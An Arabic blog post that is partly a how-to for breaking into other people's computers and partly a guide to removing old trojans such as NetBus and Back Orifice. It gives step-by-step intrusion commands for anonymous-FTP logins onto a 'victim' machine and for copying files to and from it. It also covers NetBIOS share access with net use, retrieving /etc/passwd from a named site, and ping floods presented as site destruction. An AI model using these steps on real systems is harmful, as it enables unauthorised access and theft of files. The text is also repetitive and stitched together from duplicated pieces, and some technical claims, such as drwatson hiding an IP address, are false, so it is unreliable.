و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العملية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 **** system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATH****" created.
331 User **** okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
............................................................................................................................................
اذهب الي ابدا ثم بحث واكتب patch.exe
اعمل نفس الطريقه واكتب scr هذا امتداد فايروس او باتش
صحيح انها طريقه بدائيه بس فعاله
او جرب طريقه ثانيه
من قائمة ابدا او start
افتح تشغيل او Run
ثم
اكتب التالي : system.ini
ستظهر لك صفحة أذهب للسطر الخامس فيها
اذا كان السطر هكذا .
user.exe=user.exe
فاعلم أن جهازك ما فيه الا العافية ولم يتم أختراقه
أم إن كان السطر هكذا
user.exe=user.exe *** *** ***
فاعلم أن جهازك قد تم أختراقه
واسرع باتخاذ التدابير اللازمة وشيل ملفاتك الخاصة
قبل مايخربون ويلعبون بملفاتك
ملفات التجسس
1/ اسـم الملـــف Back Oriface
تعريف :
يعمل الملف على فتــح نافذه خلفيه لجهازك ..مما يمكـن مستخدمى برنامج الباك اورفز من اختراق جهازك باستـخدام البورت رقم 3317
التخلص من الملــف :
يقم الملف بالاختبـاء فى الريجسترى فايل ( registry)
ويمكن البحث عنه (( ارجع لموضوع البحث عن ملفات التجسس داخل الريجسترى )
اتجة الى RUN..then type… regedit
HKEY_LOCAL_MACHINE + software + microsofte + windows + current Version + Run or Run once..
امتداد الملف هو EXE
واسهل طريقه للتعرف عليه لان الاسم الخاص بالسيرفر متغير هو ان اسم الملف والامتداد بينهما مسافه .. مثال
server .exe
قم بمسح المف كاملا
-------------------
2/ اسم الملف Net Bus Ver 1.6 & 1.7
تعريف :
الحقيقه ان النت باص او اتوبيس الشبكه من اسهل برامج الاختراق واشهرها لانتشار ملفه الخادم ..او المسمى بالسيرفر
التخلص منه :
النت باص يستخدم الباتش سيرفر ويختبى فى الريجسترى ..وللتخلص منه اتبع الاتى :
يجب اولا اطفاء الجهاز وتشغيله فى وضعيت السيف مود safe mode
اتجه للريجسترى ثم ابحث عن الملف الاتــى
:c:\windows\patch.exe
ثم قم بمسحه واعد تشغيل الجهاز مره اخرى
------------------
3/ اسم الملف Net Bus 2000
تعريف :
برنامج النت باص 2000 يستخدم السيرفر العادى وهو
server.exe
ولكن يمكن تغير الاسم وهو يسجل نفسه ولاكن فى منطقه اخرى فى اليجسترى
للتخلص منه :
للتخلص من البرنامج قم بالبحث عن الملف ولاكن بدلا من
HKEY_LOCAL_MACHIN
اذهب الى الخطوات الثانيه
HKEY_LOCAL_USERS
ثم ابحث عن
HKEY_LOCAL_USER\SOFTWARE\MICROSOFTE\WINDOWS\CURREN T VERSION\RUN SERVICES\Key:UMG32.EXE
الكلمه التى تحتها خط هى الخادم للبرنامج او السيرفر .. ان وجدتها قم باطفاء الجهاز واعاده تشغيله فى وضع اليسف مود
( Safe Mode)
ثم تخلص من الملف واعد تشغيل الجهاز
-------------------
4/ اسم الملــف Heack’a Tack’a
واسم السيرفر
server.exe
تعــريف :
يعتبر البرنامج من البرامج الخطره لانه يستخدم بروتكول FTP
ويصعب على كثير من برامج الكشف عن ملفات التجسس ايجــاده
التخلص من الملف :
يقم الملف او السيرفر بالاختباء فى ملف الريجسترى قم بالاتجاه الى الريجسترى كما سبق وان شرحنا وعندما تصل الى
Run
او
Run once
ابحث عن الملف
ان كنت مصاب بالملف سوف تجد الاتى فى ملف الريجسترى مع علمى الاكيد بان الكثير مصابين بهذا الملف
Explorer32 "C/WINDOWS\Expl32.exe
------------------------
قم بمسح الملف على الفور
5/ اسم الملــف Master Paradise
تعريـف :
يعتبر هذا البرنامج سيد برامج الاختراق … ويختى ايضا فى الريجسترى
التخلص منه:
اتجه للرجسترى ثم ابحث عن امتداد الملف
“C:\windowds\nameofthe.exe
عندما تجد هذا الملف فى الريجسترى قم بمسحه
6/ الاســــم ICQ Torjan
تعريف :
يقم هذا الملف بعمل ثغره للمخترقين داخل جهازك مما يساعدهم على اختراق جهازك باستخدام السيرفر الخاص بالاسكيو ..وعندما تصاب بالملف يقم الملف بتغير الاسكيو الحقيقى لديك
ICQ.exe
وابعاده وتغير اسمه ليصبح
ICQ2.EXE
التخلص منه:
يمكن التخلص من الملف بكل سهوله اتجه الى الملف الخاص بالاسكيو وقم بحذف ملف الاسكيو ICQ.EXE
ثم قم بتعديل اسم الاسكيو الحقيقى ICQ2.EXE
كيف ازالة الاختراق ومسح ملفات التجسس في جهازك؟
البحث عن ملفات الباتش عن طريق الدوس
تعتبر هذه الطريقة اسهل الطرق وتستخدم عادة لكشف الباتش فايل عن طريق استخدام الدوس .
اذهب الى الدوس ثم اكتب الامر :
c:\windows\dir patch
اذا وجدت ملف الباتش قم بمسحه بالامر الاتي :
c:\windows\delete patch* type this command
ملاحظة :طبعا قم بتغير اسم المجلد الخاص بالويندوز اذا لم يكن مثل المكتوب اعلاه
البحث داخل ملفات الريجستري
(1) اتجه الى start ثم اضغط على run وعند ظهور الشاشة اكتب الامر الاتي : regedit ثم اضغط Ok عندها سوف تظهر لك شاشة الريجستري .
(2) اختر ملف : HKEY_LOCAL_MACHINE .
(3) ثم : SOFTWARE .
(4) ثم : MICROSOFT .
(5) ثم : WINDOWS .
(6) ثم : CURRENT VERSION .
(7) ثم : RUN ملاحظة في بعض الاحيان تجد اكثر من RUN فعلى سبيل المثال سوف تجد RUN ONCE او RUN SERVICE كل ما عليك ان تبحث بها كلها .
(8) عندما تضغط على RUN سوف تظهر على يمينك شاشة الريجستري وبها اوامر الريجستري واسماء ملفات تعمل مع الويندوز .. ابحث عن اي ملف غريب مثال PATCH.EXE او EXPLO32 وغيرها وعندما تجد احد تلك الملفات قم بمسحه . وعندما نقول امسح الملف .. يمكنك عمل ذلك بوضع مؤشر الفارة على الملف والضغط على الزر الايمن للفارة واختيار امر DELETE من القائمة .
net bus 2000
برنامج النت باص 2000 يستخدم السيرفر العادي وهو server.exe ولكن يمكن تغيير الاسم وهو يسجل نفسه لكن في منطقة اخرى في الريجستري .
طريقة التخلص من البرنامج :
(1) اذهب الى قائمة start .
(2) ثم اختر run .
(3) اكتب في المستطيل الابيض regedit .
(4) اتجه الى : HKEY_LOCAL_USER .
(5) ابحث عن :
HKEY_LOCAL_USER\SOFTWARE\MICROSOFT\WINDOWS/CURRENT VERSION\RUNSERVICES\key:umg32.EXE
(6) key:umg32.exe هو الخادم للبرنامج او السيرفر .. ان وجدتها قم باطفاء جهازك واعادة تشغيله بوضعية السيف مود Safe Mode .
(7) تخلص من الملف واعد تشغيل الجهاز .
hack a tack
اسم السيرفر server.exe
يعتبر هذا البرنامج من البرامج الخطرة لانه يستخدم بروتكول FTP ويصعب على كثير من برامج الكشف عن ملفات التجسس ايجاده .
طريقة التخلص من الملف :
يقوم الملف او السيرفر بالاختباء في الريجستري .. قم بالاتجاه الى الريجستري كما سبق وان شرح وعندما تصل الى : Run او Run once ابحث عن الملف .
اذا كنت مصاب بالملف سوف تجد الاتي في ملف الريجستري )
c:\windows\Expl32.exe (file:///c:/windows/Expl32.exe) او Explorer32
قم بمسح الملف على الفور .
back oriface
يعمل الملف على فتح نافذة خلفية لجهازك .. مما يمكن مستخدمي برنامج باك اوريفيس من اختراق جهازك باستخدام البورت رقم 3317
طريقة التخلص من الملف
يقوم الملف بالاختباء في الريجستري (registry) ويمكن البحث عنه ( ارجع لموضوع البحث عن ملفات التجسس داخل الريجستري ) اتجه الى :
Run..then type ...regedit
اتبع هذا التسلسل
HKEY_LOCAL_MACHINE+SOFTWARE+MICROSOFT+WINDOWS
CURRENT VERSION +RUN OR RUN ONCE
امتداد الملف هو EXE واسهل طريقة لتعرف عليه لان الاسم الخاص بالسيرفر متغير وهو ان اسم الملف والامتداد بينهما مسافة مثال :
server .exe
لاحظ المسافة بين server وبين exe
قم بمسح الملف
الوقايه خير من العلاج
لا تفتح اي بريد الكتروني مرسل من شخص مجهول او لا تعرفه .
لا تستقبل اي برنامج او ملف باستخدام الاسكيو او اي من برامج التشات من شخص لا تثق به .
لا تقوم بانزال برنامج من موقع غير معروف مالم تكن لديك برامج الكشف عن الفايروسات او ملفات التجسس .. مثل برنامج مكافي او نورتن انتي فايروس .
اين يختبيء ملف التجسس في جهازك ؟
عندما تصاب باحد تلك الملفات فمعضمها او اغلبها يتجه وعلى الفور الى ما يسمى بالريجستري (registry) . لماذا ؟ لانه عند كل مرة تقوم بتشغيل الويندوز فان النظام يقوم بتشغيل البرامج المساعدة والتي هي موجودة بالريجستري .. مثل برامج الفايروسات والاسكيو وغيرها فيقوم النظام ايضا بتشغيل ملف التجسس معها .
ابطال عمل الكوكز
ما هو الكوكز هو عبارة عن نظام يستخدمة بعض المواقع لتعرف على الزائر مثل كم عدد مرات الزيارة نوع الجهاز التعرف على الإي بي البرامج الموجودة في جهازك ويمكن إرسال ملف عن طريق الكوكز إلى جهازك
Internet option
ومنها اختار الامر
Advance
وابحث عن الكوكز سوف تجد تحت الكوكز ثلاث اوامر الاول القبول المباشر والثانى طلب الاذن منك والثالث ابطال الكوكز
اما اذا كنت من مستخدمى اكسبلور 5 .. فلا اختلاف كبير الا ان الكوكز نقلت الى
Security
ومنها تجد الامر
Custom Level
ومنها سوف تجد الكوكز قم بتعطيله
*********************************************************************************************
طريقة اخرى لحماية جهازك من الاختراق
ماهى أداة SpyDetectFree ؟
هذه الأداة مجانية التحميل وصغيرة الحجم حيث لا يتعدى حجمها 2 ميجابايت، ولكنها مفيدة للغاية حيث بأستخدمها وتثبيتها على جهاز الكمبيوتر سوف تتمكن من معرفة أذا كان جهاز الكمبيوتر الخاص بك مصاب ببرامج التجسس أم لا ومعرفة أذا كان يتم تسجيل نقرات لوحة المفاتيح أم لا .
بمجر أن تقوم بتحميل الأداة على الكمبيوتر وفك ضغط الملف لتظهر لك أيقونة البرنامج exe وهى لا تحتاج الى تثبيت فبمجرد النقر عليها بزر الماوس سوف تعمل معك بشكل تلقائى لتظهر لك الواجهة الرئيسية للأداة تقوم بالنقر على " Check Now " لتظهر لك واجهة جديدة على اليسار سوف تجد Am I Being Spied On والخاصة بفحص كل شىء فى خلفية جهاز الكمبيوتر وفى حالة أذا كنت هناك أى برامج تجسس تخبرك بها الأداة على الفور، وفى الجانب الأيمن سوف تجد Being Monitored والمسؤولة عن معرفة اذا كانت هناك برامج تستخدم الـ API الخاصة بتطبيقات نظام ويندوز لمعرفة النوافذ والبرامج المفتوحة .
فى حالة اذا ظهر لك لون غير اللون الاخضر تقوم بالنقر على Details لتظهر لك نافذة جديدة بها جميع العمليات ومن ثم تحديد العمليات التى تقوم بالتجسس عليك باللون الأصفر . {رابط تحميل الأداة}
واخيرا سوف اريكم كيف يتم اختراق الجهاز بcmd
اخطر واغرب الأوامر بالدوس للهكر
لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذه المنافذ في جهازك
NETSTAT -A
هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذه اوامر خطيرة
الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).
2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .
3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .
4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine **** Table
____________________________________
**** Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .
5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.
6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>
7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Share**** Type Comment
MY ********S Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User ****-Password
وهما يكونان محفوظين في ملف يسمي
PASSWD غالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host **** مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
passtttttttt@yahoo.com
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز ******s/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl
بعض الاوامر الخاصه بالويندوز
DIR استعراض للدايروكتوري DIR
CLS ابقاء شاشة الدوس خالية من الاوامر CLS
RD حذف مجلد RD
MD انشاء مجلد MD
DATE تعديل التاريخ DATE
TIME تعديل الوقت TIME
LABLE عرض وتعديل اسم الدرايف LABLE
VOL عرض اسم الدرايف VOL
VER لمعرفة اي اصدراة من الدوس تعمل بها VER
FORMAT C: او غيره حذف اي شئ يكون على الدرايف الواحد FORMAT
TYPE اسم الملف عرض الملفات النصية فقط TYPE
DEL اسم الملف حذف ملف معين DEL
REN اسم الملف اعادة تسمية ملف معين REN
COPY مسار الملف او المجلد نسخ مجلد معين او ملف محدد COPY
PROMPT تغيير شكل المؤشر PROMPT
XCOPY نسخ مجلد يحتوي على مجلدات فرعية بداخله XCOPY
DEFRAG الغاء تجزئة القرص DEFRAG
SCANDISK عمل فحص للهارديسك SCANDISK
SYS نقل ملفات النظام الى القرص المرن SYS
UNDELET استرجاع ملف حذفته من جهازك او حتى من سلة المحذوفات لكن يشترط ان لا يمر اكثر من اسبوع كحد أقصى على مدة الحذف UNDELET
FIND اسم الملف او المجلد بحث FIND
DOSKEY لعمل حفظ للأوامر اللتي استعملتها DOSKEY
MASV فاحص للفيروسات MSAV
MSBACKUP لعمل نسخة احتياطية للجهاز MSBACKUP
MEM عرض بيان عن الذاكرة رام MEM
CHKDSK فحص الهارديسك CHKDSK
DISKCOP للمقارنة بين ديسكات ذات حجم متساوي DISKCOP
TREE عرض كل مايحتويه الدرايف الواحد TREE
CD للإنتقال من مجلد الى آخر CD
اوامر الدوس
الأمر
شرح عن الأمر
اشكالة
DIR
يعرض هذا الأمر محتويات القرص او الدليل
DIR/P <> DIR/W <> DIR/P/W <> DIR .الامتدار(EXE) .
CD
للدخول و الخروج من المجلد
CD اسم المجلد(CD ******S) <> CD.. <> CD\ .
MD
لإنشاء مجلد
MD اسم المجلد( MD DRH ) .
REN
لتغير اسم الملف او تغير اسم المجلد
REN اسم الملف او المجلد REN AHMED.TXT ALI.TXT
COPY
لنسخ ملف او نسخ مجلد
COPY اسم الملف او المجلد COPY OMAR.TXT A: <> COPY *.* A: <> COPY *.TXT A: <> COPY OMAR.* A: <>COPY. A:\ OMAR
XCOPY
لنسخ قرص مرن الى قرص مرن
XCOPY A: A:
COPY CON
لإنشاء ملف
COPY CON OMAR.TXT .
MEMMAKER
لترتيب محتويات الذاكرة
MEMMAKER
DEFRAG
لترتيب المفات على القرص الصلب
DEFRAG
FDISK
يعمل هذا الامر على تقسيم القرص الصلب
FDISK
FORMAT
يهلم هذا الامر على تهيئة الجهاز ومسح البيانات
FORMAT محرك الاقراص (FORMAT C
COPY.....PRI
هذا الامر يطبع الملفات من الدوس
COPY OMAR.TXT PRI
ملاحظة
كل هذا الاوامر تكتب عند محث الدوس
C:\ DIR
C:\ MD DRH <> C:\ COPY OMAR.TXT A:...........الخ
أوامر الدوس
الامر
الوظيفة
TIME
لمعرفه الوقت مع امكانيه التعديل
DATE
معرفه التاريخ مع امكانيه التعديل
DIR
عرض محتويات الإسطوانة الصلبة او المرنة
DIR/P عرض المحتويات صفحه صفحه
DIR/W عرض المحتويات بصورة مستعرضة
DIR/O عرض الفهارس اولاً ثم الملفات مع الترتيب
DIR/AD عرض الفهارس فقط
DIR/B عرض محتوى الاسطوانه الصلبه او المرنه بدون الحجم والتاريخ والوقت
DIR/L عرض محتوى الاسطوانه الصلبه بالحروف الصغيره
DIR/S عرض جميع الملفات والبحث عن ملف معين
DIR->PRN طباعة محتوى الاسطوانه على الورقة
DIR->ASH عرض الفهارس والملفات المخفيه
DIR-*.SYS عرض الملفات التي لها امتداد SYS
DIR-config.*f عرض ملفات config باي امتداد
DIR-C*.*A عرض الملفات التي تبدا بحرف ال C
DIR-??M*.*A عرض الملفات التي يكون الحرف الثالث لها M
VOL معرفة اسم الاسطوانة الصلبة او المرنة
CLS تنظيف الشاشة (اي مسح البيانات الموجوده)
VER معرفة نوع اصدار الدوس
DOSKEY أمر تخزين أوامر نظام الدوس
COPY-CON-(file ****)f إنشاء ملف جديد
COPY-(file ****)-CON أمر عرض محتوى الملف
COPY-(file ****)-prn امر طباعة محتويات الملف
COPY امر نسخ الملفات
DEL أمر مسح ملف أو مجموعه ملفات
UNDELETE امر استرجاع الملفات التي تم حذفها
MEM معرفه حجم الذاكره
SORT
فرز وترتيب محتويات الملف
PROMPT تغيير شكل المحث
FIND بحث عن كلمه او عبارة داخل ملف
CD/Aاو CD..D الخروج من الدليل
SYS إعداد قرص نظام التشغيل
SCANDISK فحص الاسطوانه
FORMAT عمل تهيئة للإسطوانة
أختراق الأجهزة با الدوس طريقه ناجحه 100
طريقة إقتحام عبر فتيبي
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP>
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP>
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء
إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 ***srv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail ****) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق
230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العملية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 **** system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATH****" created.
331 User **** okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
*********************************************************************************************
وارجوا اتضعوا تعليققكم فى الاسفل كرائ على هذا الموضوع
بقلم / احمد الجمل
بقلم / احمد الجمل
ليست هناك تعليقات:
إرسال تعليق